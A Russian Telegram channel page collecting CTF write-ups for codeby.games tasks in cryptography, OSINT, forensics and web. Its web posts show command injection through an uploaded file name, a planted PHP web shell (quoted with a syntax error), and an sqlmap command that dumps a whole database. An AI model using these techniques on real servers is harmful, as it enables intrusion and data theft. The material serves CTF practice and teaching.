Райтапы по CTF{2025}
2.83K subscribers
215 photos
25 videos
87 files
393 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
Друзья! Кто решил ETL файлы? Не стесняемся, присылайте нам ваши решения! Главное подход к задаче, потому каждый из них уникален!

Для публикации райтапов пишите: @freenameruuuu и @coffeedipso
2
#Криптография Холмы от @andreika47

Дана матрица с номерами и строка с алфавитом

-------------------------
|76 |101|115|116|101|114|
-------------------------
|32 |83 |97 |110|100|101|
-------------------------
|114|115|32 |115|104|111|
-------------------------
|117|108|100|32 |104|101|
-------------------------
|108|112|32 |121|111|117|
-------------------------
|32 |58 |41 |41 |41 |42 |
-------------------------

KLZCOUKTVOUWUKDOBGZVJIIIRGVHXCRQUCNOX_IBBL

Пробуем декодировать матрицу в ascii. Получаем имя и фамилю криптографа, который знаменит шифром Хилла.

Гуглим , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.

Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица.

Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания.

Подобрав правильный алфавит (нам нужны буквы латиницы и символ _) получаем ответ!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3💊1
#WEB таск "Печенье" от @ErikPupOn:

Реализация через Python!

import requests
url = "http://62.173.140.174:46002/"
session = requests.Session()
cookies_data = {
"cookies": "[Sugar cookies, Oatmeal cookies, Crackers cookies]",
"amount": '[1, 5, 2]'
}
response = session.get(url, cookies=cookies_data)
print(response.text)
session.close()


🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬12🌚3
#OSINT от @scars_on_the_hands

В 1983 году в одной из стран произошел ужасный инцидент. Говорят, что известный актер был замешан в этом инциденте, но точную дату его рождения нам и предстоит узнать.


По вложенной фотографии с помощью Google Lens можно найти статью, в которой упоминается много раз страна Грузия.

По поиску в интернете 1983 Грузия ужасная катастрофа выдается случай с захватом самолета.

Воспользуемся помощью Chat GPT и попросим его выдать всех знаменитостей, вовлеченных в данный инцидент.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
#OSINT Перелёты от @Zer0_Tw0_02

~ По заданию говориться о каком-то произошедшем инциденте в 1983г и участвовавшем в нём актёре, дату рождения которого нам и предстоит узнать.

С помощью любой поисковой системы, либо Нейро от Яндекса ищем информацию по запросу "Мировые инциденты 1983г", и открыв Список террористических актов 1983 года можем найти Попытку угона Ту-134 в ноябре 1983 года, среди которых в числе причастных имеется нужное нам лицо. Остаётся лишь дело за малым - найти его дату рождения.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1
#OSINT Анимешник от @Zer0_Tw0_02

~ По заданию говориться о друге-анимешнике, который потерялся где-то на пару часов в аэропорту Токио 17 января 2024 на самолёте с бортовым номером серии XX-XXX

Первым делом ищем где взять архивные вылеты/прилеты аэропортов Токио и натыкаемся на сайт, на котором выбираем TOKYO NARITA INTERNATIONAL AIRPORT, после чего находим Список стран и их префиксов регистрации воздушных судов и перебираем по дате каждый подходящий рейс, чтобы изучить бортовые номера самолётов.
Либо выключаем мозг и читаем прям через слово, и сложив пазл воедино "Самолёт+Аниме" логически додумываем либо это Аниме-рейс, либо скин. Используя любой поисковик находим самолёты серии Pokemon Jet и там уже лежит заветный борт.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍121
Рекомендательный контент!
Фильм "Хакеры"

Команда университетских компьютерных гениев вступает в войну с сетевым злодеем
История про хакеров, которые случайно взламывают защиту корпорации «Эллингсон» и подключаются к схеме хищения средств, искусно замаскированной под компьютерный вирус.

https://www.afisha.ru/movie/hakery-165867/
👍7🔥2💔2
#WEB "Архиватор" от @IFed00
Открываем задание, видим одностраничник (index.php) который позволяет загружать файлы и выдаёт zip архив с ними. Имя архива рандомизируется, а сами архивы лежат в /upload/.

После изучения понимаем, что единственная ручка за которую можно дёргать - это имя посылаемого файла. Мой мощный тиммейт обнаружил, что имя используется в bash'e подменив его (с помощью burp proxi) на ; sleep 10; и получив соответствующую задержку.
Соответственно пытаемся передать для архивации какой-то более интересный путь ("/" если готовы качать потенциальные гигабайты в виде архивированной системы) и... архив не создаётся( Видимо внутренняя ошибка, о которой сайт нам не сообщает. Собственно решение на поверхности: $(pwd) а потом и $(cd .. && pwd) Warning: potential >10MB .zip

Таким образом получаем доступ к исходному коду index.php, который подтверждает все догадки: имя файла используется как часть команды bash. Однако перед этим сервер пытается переместить наш файл из временного хранилища со случайными именем в /uploads/*filename* и если имя содержит запрещённые символы (для имён файлов) выполнение прерывается. Самый интересный из запрещённых символов это конечно "/" который как раз позволил бы нам "походить" по системы и поискать флаг.

Отсюда решения могут быть разными, вот моё:
загрузим простенький бэкдор на php, который будет исполнять команду переданную через GET-запрос c параметром cmd в bash и выводить ответ:
<?php echo shell_exec($_GET('cmd') ?>
Чтобы не возиться с экранированием символов закодируем его в base64 и отправим на архивацию файл со следующим "именем":
$(cd .. && echo 'base64blob' | base64 --decode > backdoor.php)
Теперь в директории с правами выполнения у нас есть свой человечек...

Немного /backdoor.php?cmd=ls и в /var/www/ обнаруживаем flag.txt! Дальше cat /var/www/flag.txt и наконец rm backdoor.php

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
13👏2💊2🤯1
#OSINT Аниме-друг от @coffeedipso, @maoirt:

Находим сайт, который предоставляют информацию о самолетах, например -> (https://www.airliners.net/)

(The Best Airplane Information, Aviation Photos and Aviation News! 3,590,595 photos online!), вбиваем дату и место, там будет 2 страницы фотографий самолетов.

Ищем в стикерах аниме (почти последний, 2 страница), смотрим на номер!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍1
Рекомендательный контент!
Вторжение. Краткая история русских хакеров

Летом 2016 года неизвестные выложили в интернет переписку высших чинов Демократической партии США — и российские хакеры, предположительно работающие на Кремль, моментально превратились в один из главных сюжетов мировой политики. Спецкор «Медузы», обладатель премии GQ в номинации «Журналист года» и четырех премий «Редколлегия» Даниил Туровский к тому времени писал об этих людях уже несколько лет: одни из них публиковали архивы почты российских чиновников, другие взламывали госсайты сопредельных стран по просьбе спецслужб, третьи просто зарабатывали миллионы, воруя их по всему миру.

«Вторжение» — самая полная история российских хакеров: от советских матшкол и постсоветской нищеты к мировой кибервойне и транснациональным преступным группировкам. Книга описывает новый тип власти — но, как показывает Туровский, люди, которые обладают этой властью, сталкиваются все с теми же моральными дилеммами, выбирая между тюрьмой и сумой, чувством и долгом, добром и злом.

Читать:https://bookmate.ru/books/zkRpzayD

Слушать: https://bookmate.ru/audiobooks/hlFogJtL
🔥5🖕3🤨2
#WEB Снитч от @freenameruuuu

Очень смешной таск. Первым делом пытался что-то сделать с JS, котроый отвечал за перемещение кнопки с целью, но потом глянув чуть ниже увидел в диве флаг. Такие дела)))

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
💊51😁1
#WEB Игровой автомат от @w0ltage

Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.

Предположительно, на бэкенде SQL запрос к БД вида SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLi

В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат

result=944&hash=6bed8834f12ba1043159b2cd5f846708


Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле

md5(sha256(sha1(sha256(sha1(result)))))


Зная это, дружим sqlmap с генерацией хэша через --eval и дампим БД

sqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all


*переменная result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"

Из БД вытаскиваем пароль от админа, логинимся и получаем флаг

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🖕3👍2
#OSINT Код Да Винчи от @Zer0_Tw0_02
~В описании говорится о Кодексе или собрании от ДаВинчи и связи с Атлантом

Открыв тот же Вики ДаВинчи находим все рукописи, после отбросив все лишние элементы понимаем, что это один из кодексов "Атлантический кодекс". Забив в поисковую строку "Кодекс Атланта" Яндекс в первых строках выдаёт сайт с отсканированной копией данного кодекса. Остаётся только ввести флаг с использованием ДОМЕНА 3-го УРОВНЯ.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Завтра опубликуем решения по всему треку с #WEB
11
Друзья! Всем доброе утро.

Выкладываем ВСЕ по #WEB от @ishanyam

Ссылка на райтапы, которые прекрасно организованы в статьи

https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam

PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из раздела web. Михаил собирается позже добавить по последнему Колизею . Как только они там появятся мы сообщим

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩8🤔3🔥1
Forwarded from Artyom
Игровой автомат

Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.

Предположительно, на бэкенде SQL запрос к БД вида SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLi

В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат

result=944&hash=6bed8834f12ba1043159b2cd5f846708


Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле

md5(sha256(sha1(sha256(sha1(result)))))


Зная это, дружим sqlmap с генерацией хэша через --eval и дампим БД

sqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all


*переменная result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"

Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
👍5😐21
#Форензика Гул земли 2 от @synberg

Хочу предложить решение таски из форензики "Гул земли 2"

В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36

Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👏51
#Криптография от @andreika47

Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.

Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.

Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81